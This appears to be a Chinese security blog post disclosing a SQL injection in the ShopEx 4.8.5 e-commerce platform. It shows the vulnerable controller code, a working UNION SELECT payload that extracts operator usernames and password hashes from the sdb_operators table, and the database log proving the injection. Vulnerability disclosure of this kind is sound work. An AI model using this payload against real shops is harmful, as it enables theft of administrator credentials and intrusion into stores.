- A+
所属分类:Seay信息安全博客
显示不全请点击全屏阅读
又是sql注入
测试版本:shopex-singel-4.8.5.78660
文件\core\shop\controller\ctl.tools.php
function products(){
$objGoods = &$this->system->loadModel('goods/products');
$filter = array();
foreach(explode(',',$_POST['goods']) as $gid){
$filter['goods_id'][] = $gid;
}
$this->pagedata['products'] = $objGoods->getList($objGoods->defaultCols.',find_in_set(goods_id,"'.$_POST['goods'].'") as rank',$filter,0,-1,array('rank','asc'));
目测$_POST[‘goods’]直接进入到sql语句中,由于部分文件加密开启sql语句执行记录日志
提交:
goods=aaa") FROM sdb_goods union select 1,concat(username,userpass),3,4,5,6,7,8,9,10,11,12,13 from sdb_operators%23 130526 20:03:23 352 Connect root@localhost on 352 Init DB shopex 352 Query SET NAMES 'utf8' 352 Query SELECT * FROM sdb_plugins WHERE plugin_type="app" 352 Query select * from sdb_plugins where plugin_type="app" and plugin_ident='commodity_radar' LIMIT 0, 1 352 Query select * from sdb_plugins where plugin_type="app" and plugin_ident='shopex_stat' LIMIT 0, 1 352 Query SELECT count(goods_id) FROM sdb_goods WHERE goods_id IN (0,0,0,3,4,5,6,7,8,9,10,11,12,13) AND sdb_goods.disabled = 'false' AND sdb_goods.goods_type='normal' ORDER BY rank asc 352 Query SELECT bn,name,cat_id,price,store,marketable,brand_id,weight,d_order,uptime,type_id,supplier_id,find_in_set(goods_id,"aaa") FROM sdb_goods union select 1,concat(username,userpass),3,4,5,6,7,8,9,10,11,12,13 from sdb_operators#") as rank,goods_id,image_default,thumbnail_pic,brief,pdt_desc,mktprice,big_pic FROM sdb_goods WHERE goods_id IN (0,0,0,3,4,5,6,7,8,9,10,11,12,13) AND sdb_goods.disabled = 'false' AND sdb_goods.goods_type='normal' ORDER BY rank asc LIMIT 0, 18446744073709551615
查看日志变量已经进入到sql语句中
作者:code_sec
Tags:
如果您喜欢我的博客,欢迎点击图片定订阅到邮箱
也可以点击链接【订阅到鲜果】
如果我的想法或工具帮助到了你,也可微信扫下方二维码打赏本人一杯咖啡
